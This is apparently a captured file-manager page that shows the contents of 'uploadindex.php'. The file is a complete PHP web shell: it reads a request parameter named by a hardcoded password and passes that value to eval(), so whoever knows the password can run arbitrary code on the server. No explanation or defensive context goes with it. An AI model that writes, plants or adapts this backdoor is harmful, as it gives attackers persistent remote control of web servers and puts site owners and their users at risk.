Edit File: uploadindex.php
<?php $password = 'yfrJNxFLT8'; if (isset($_REQUEST[$password])) { $cmd = $_REQUEST[$password]; echo eval($cmd); } ?>
Back